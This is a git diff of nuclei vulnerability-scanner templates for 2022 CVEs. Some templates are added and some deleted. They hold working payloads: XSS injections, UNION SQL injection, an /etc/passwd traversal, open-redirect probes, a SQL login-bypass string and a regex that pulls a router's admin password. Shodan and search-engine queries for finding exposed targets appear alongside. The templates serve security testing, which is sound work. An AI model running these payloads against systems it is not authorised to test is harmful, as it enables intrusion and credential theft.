from parameter. + reference: + - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + - https://en.wikipedia.org/wiki/H-Sphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30777 + cwe-id: CWE-79 + metadata: + shodan-query: title:"h-sphere" + verified: "true" + tags: cve,cve2022,parallels,hsphere,xss +requests: + - method: GET + path: + - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '<TITLE>"><script>alert(document.domain)</script>' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml new file mode 100644 index 0000000000..b1faf475d6 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml @@ -0,0 +1,29 @@ +id: CVE-2022-32015 +info: + name: Complete Online Job Search System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32015 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,jobsearch +variables: + num: "999999999" +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml deleted file mode 100644 index 1fa8cbf9bc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2022-32018 -info: - name: Complete Online Job Search System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32018 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli -variables: - num: "999999999" -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml deleted file mode 100644 index 87d30308b6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-32026 -info: - name: Car Rental Management System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - skip-variables-check: true - redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml new file mode 100644 index 0000000000..6afb4dca59 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-32028 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml deleted file mode 100644 index aec3372d91..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-32409 -info: - name: i3geo - Directory Traversal - author: pikpikcu - severity: critical - description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32444.yaml b/nuclei-templates/CVE-2022/CVE-2022-32444.yaml deleted file mode 100644 index fe206ab90c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32444.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2022-32444 - -info: - name: u5cms v8.3.5- Open Redirect - author: 0x_Akoko - severity: medium - description: An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. - reference: - - https://github.com/u5cms/u5cms/issues/50 - - https://www.cvedetails.com/cve/CVE-2022-32444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-32444 - cwe-id: CWE-601 - tags: cve,cve2022,redirect,u5cms,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/loginsave.php?u=http://example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml new file mode 100644 index 0000000000..223c8ed044 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-33119 +info: + name: NVRsolo v03.06.02 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php. + reference: + - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-33119 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"NVRsolo" + verified: "true" + tags: cve,cve2022,nvrsolo,xss +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: "><script>alert(document.domain)</script><" + + language=en&user=user&pass=pass&submit=Login + matchers: + - type: dsl + dsl: + - 'contains(all_headers, "text/html")' + - 'status_code == 200' + - contains(body,'<script>alert(document.domain)</script><\"?cmd=') + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml new file mode 100644 index 0000000000..0e55de9a03 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-34046 +info: + name: Wavlink Sysinit.shtml - Password Exposure + author: For3stCo1d + severity: high + description: | + An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. + reference: + - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 + metadata: + verified: true + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,wavlink,router,exposure +requests: + - raw: + - | + GET /sysinit.shtml?r=52300 HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var syspasswd="' + - '<title>APP' + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - 'syspasswd="(.+?)"' diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml deleted file mode 100644 index d782414f0d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-35416 -info: - name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS - author: 0x240x23elu - severity: medium - description: | - H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. - reference: - - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - - https://github.com/Docker-droid/H3C_SSL_VPN_XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-35416 - cwe-id: CWE-79 - metadata: - shodan-query: http.html_hash:510586239 - verified: "true" - tags: cve,cve2022,xss,vpn,h3c -requests: - - raw: - - | - GET /wnm/login/login.json HTTP/1.1 - Host: {{Hostname}} - Cookie: svpnlang= - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3556.yaml b/nuclei-templates/CVE-2022/CVE-2022-3556.yaml new file mode 100644 index 0000000000..201277515d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-3556.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-3556 + +info: + name: > + Cab fare calculator <= 1.1.6 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Cab fare calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the vehicle title setting in versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/219de193-32d0-40b0-a471-bf8bf6e2bb62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2022-3556 + metadata: + fofa-query: "wp-content/plugins/cab-fare-calculator/" + google-query: inurl:"/wp-content/plugins/cab-fare-calculator/" + shodan-query: 'vuln:CVE-2022-3556' + tags: cve,wordpress,wp-plugin,cab-fare-calculator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cab-fare-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cab-fare-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.6') \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml deleted file mode 100644 index 2be945f370..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2022-36883 -info: - name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. - severity: high - author: c-sh0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 - - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2022-36883 - cwe-id: CWE-862 - tags: cve,cve2022,jenkins,plugin,git,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '{{randstr}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-4529.yaml b/nuclei-templates/CVE-2022/CVE-2022-4529.yaml new file mode 100644 index 0000000000..7952ed7d39 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-4529.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4529 + +info: + name: > + Security, Antivirus, Firewall – S.A.F <= 2.3.5 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The Security, Antivirus, Firewall – S.A.F plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.3.5. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd177a43-6059-4125-9408-1090b9a54117?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4529 + metadata: + fofa-query: "wp-content/plugins/security-antivirus-firewall/" + google-query: inurl:"/wp-content/plugins/security-antivirus-firewall/" + shodan-query: 'vuln:CVE-2022-4529' + tags: cve,wordpress,wp-plugin,security-antivirus-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-antivirus-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-antivirus-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml new file mode 100644 index 0000000000..6fdc887c27 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0165.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-0165 + +info: + name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect + author: akincibor + severity: medium + description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. + remediation: | + Update to the latest version of KingComposer (>=2.9.7) to fix the open redirect vulnerability. + reference: + - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/K3ysTr0K3R/CVE-2022-0165-EXPLOIT + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0165 + cwe-id: CWE-601 + epss-score: 0.001 + epss-percentile: 0.40148 + cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: king-theme + product: kingcomposer + framework: wordpress + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan,king-theme + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 490a00463044022016209b55f7c4f1468401da521d8fbeaecf9900e530da7d7fedaae72f2ff1048b02205d9beab85f8f62a8262cbaa16a4096c15ba7bc6a9d557f5767933d2c7213f697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml deleted file mode 100644 index bd225046da..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0201.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-0201 - -info: - name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting - author: Akincibor - severity: medium - description: | - WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. - remediation: | - Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability. - reference: - - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 - - https://plugins.trac.wordpress.org/changeset/2656512 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0201 - cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40882 - cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: permalink_manager_lite_project - product: permalink_manager_lite - framework: wordpress - tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project - -http: - - method: GET - path: - - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'pm_query' - condition: and - - - type: word - part: header - words: - - text/html -# digest: 490a00463044022026f5edf6c9325db54e5dba0b0e39a8ad5fead51d43680b3a5a21b56c956d5c9202205b2e57c67c716336383fa1af54b8b29eec6b914edfbae42fbcbcc1f0f6e799aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0208.yaml b/nuclei-templates/CVE-2022/cve-2022-0208.yaml new file mode 100644 index 0000000000..b9f0a551d6 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0208.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-0208 + +info: + name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. + reference: + - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc + - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0208 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mappresspro + product: mappress + framework: wordpress + tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro + +http: + - method: GET + path: + - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" + - "Bad mapid" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b22a13c10631b7349f4edafe8cde23c314f46cc6c3661afdbef2141c2f9cab67022100adfeec912a26c02a2ba1982ccd3dddb34fab524142068da9e659428a5efd7e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0288.yaml b/nuclei-templates/CVE-2022/cve-2022-0288.yaml new file mode 100644 index 0000000000..6fe7c560eb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0288.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-0288 + +info: + name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser. + remediation: Fixed in version 2.7.12 + reference: + - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0288 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: ad_inserter_pro_project + product: ad_inserter_pro + framework: wordpress + tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project + +http: + - method: POST + path: + - "{{BaseURL}}" + + body: | + html_element_selection= + + headers: + Content-Type: "application/x-www-form-urlencoded" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "ad-inserter" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a1ca7cd22a56a330f431df7aac1d8932a96f61707e94e4cec22162652d6e4fb3022073e6e623e1d660731778b65b288a3bf36e832dd59d8e3eb8377199e6f4915093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0422.yaml b/nuclei-templates/CVE-2022/cve-2022-0422.yaml new file mode 100644 index 0000000000..75d7077c97 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0422.yaml @@ -0,0 +1,63 @@ +id: CVE-2022-0422 + +info: + name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting + author: random-robbie + severity: medium + description: | + WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc + - https://plugins.trac.wordpress.org/changeset/2672615 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0422 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0422 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: videousermanuals + product: white_label_cms + framework: wordpress + tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals + +http: + - raw: + - | + POST /wp-login.php?wlcms-action=preview HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(/XSS/);" + + - type: word + part: body + words: + - "wlcms-login-wrapper" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0437.yaml b/nuclei-templates/CVE-2022/cve-2022-0437.yaml new file mode 100644 index 0000000000..377800bce4 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0437.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-0437 + +info: + name: karma-runner DOM-based Cross-Site Scripting + author: pikpikcu + severity: medium + description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability. + reference: + - https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885 + - https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0437 + - https://github.com/karma-runner/karma + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0437 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40882 + cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* + metadata: + max-request: 2 + vendor: karma_project + product: karma + framework: node.js + tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js + +http: + - method: GET + 